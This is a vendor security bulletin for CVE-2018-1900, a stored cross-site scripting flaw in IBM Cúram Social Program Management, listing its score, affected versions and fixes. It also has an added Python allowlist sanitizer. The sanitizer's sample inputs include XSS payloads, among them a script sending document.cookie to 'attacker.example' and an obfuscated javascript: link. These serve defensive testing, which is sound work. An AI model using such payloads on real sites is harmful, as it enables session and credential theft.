A recent product penetration test identified a stored cross-site scripting vulnerability in IBM Cúram Social Program Management. The issue relates to the rendering of some rich text fields: where such content passes through a shared infrastructure component, renderer, or converter, malicious content could be injected into the stored field and later rendered in the web user interface.
CVEID: CVE-2018-1900
DESCRIPTION: IBM Cúram Social Program Management is vulnerable to cross-site scripting. The vulnerability enables users to embed arbitrary JavaScript code in the web user interface that alters the intended functionality and potentially leads to credentials disclosure within a trusted session.
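For context on the class of issue described above, the following is an added illustration and not IBM Cúram code: the product's rich text renderer is not public and nothing here reflects it. It shows the allowlist-based sanitization a rich text renderer or converter needs so that stored field content cannot carry script to another user's browser: tags outside an allowlist are dropped, `script` and `style` bodies are discarded, event-handler attributes are removed, and link targets are restricted to safe URL schemes. The allowlist and the sample field contents are constructed for the example.

```python
"""Allowlist-based rich text sanitizer (added illustration, not IBM Cúram code).

Stored XSS in rich text fields arises when a renderer or converter echoes
stored markup to the browser without constraining it. The safe pattern is to
rebuild the markup from an allowlist rather than to blocklist bad strings.
"""
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hypothetical allowlist for a rich text field: formatting, lists and links only.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
VOID_TAGS = {"br"}
SAFE_SCHEMES = {"http", "https", "mailto", ""}  # "" = relative URL
RAW_TEXT_TAGS = {"script", "style"}             # drop the tag AND its body


def _safe_href(value):
    # Browsers ignore ASCII control characters and spaces inside a URL, so a
    # value such as "java\tscript:..." must be normalised before the scheme test.
    cleaned = re.sub(r"[\x00-\x20]", "", value or "")
    return urlsplit(cleaned).scheme.lower() in SAFE_SCHEMES


class RichTextSanitizer(HTMLParser):
    """Re-emits only allowlisted tags/attributes; all text is re-escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []     # allowed tags currently open, for re-balancing
        self.skip_depth = 0     # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in RAW_TEXT_TAGS:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return                      # unknown tag dropped, its text kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue                # removes onclick=, style=, etc.
            if name == "href" and not _safe_href(value):
                continue                # removes javascript:, data:, ...
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in RAW_TEXT_TAGS:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open_tags:
            return
        while True:                     # close intermediates so output nests
            top = self.open_tags.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def result(self):
        self.close()
        while self.open_tags:           # close anything the input left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_rich_text(markup):
    """Return markup safe to render, keeping only allowlisted structure."""
    p = RichTextSanitizer()
    p.feed(markup)
    return p.result()


# Constructed samples of the kind of content a stored rich text field might hold.
SAMPLES = {
    "benign": '<p>Case note for <b>client</b> &amp; family</p>',
    "script": '<p>note<script>document.location="https://attacker.example/?"+document.cookie</script></p>',
    "handler": '<b onmouseover="steal()">text</b><img src=x onerror=alert(1)>',
    "href": '<a href="  java&#9;script:alert(1)">click</a> <a href="https://example.test/">ok</a>',
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:8} {sanitize_rich_text(raw)}")
```

The sanitizer is applied at the point where stored content is turned into HTML for the browser, not only at input time, because content that reached the database through another path (an import, a converter, an older release) is otherwise trusted unchanged. Re-escaping all text and re-emitting tags from scratch means the output never contains bytes the attacker chose outside the allowlist.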
CVSS Base Score: 5.4
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/152529> for the current score
CVSS Environmental Score: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)
IBM Cúram Social Program Management 7.0.2.0 - 7.0.4.0
IBM Cúram Social Program Management 7.0.0.0 - 7.0.1.0
IBM Cúram Social Program Management 6.2.0.0 - 6.2.0.6
IBM Cúram Social Program Management 6.1.0.0 - 6.1.1.6
IBM Cúram Social Program Management 6.0.5.0 - 6.0.5.10
Product | VRMF | Remediation/First Fix
---|---|---
Cúram SPM | 7.0.4 | Visit IBM Fix Central and upgrade to 7.0.4.0 iFix1 or a subsequent 7.0.4 release.
Cúram SPM | 7.0.1 | Visit IBM Fix Central and upgrade to 7.0.1.3 or a subsequent 7.0.1 release.
Cúram SPM | 6.2.0 | Visit IBM Fix Central and upgrade to 6.2.0.6 iFix2 or a subsequent 6.2.0 release.
Cúram SPM | 6.1.1 | Visit IBM Fix Central and upgrade to 6.1.1.6 iFix2 or a subsequent 6.1.1 release.
Cúram SPM | 6.0.5 | Visit IBM Fix Central and upgrade to 6.0.5.10 iFix4 or a subsequent 6.0.5.10 release.
For information about all other versions, contact IBM Cúram Social Program Management customer support.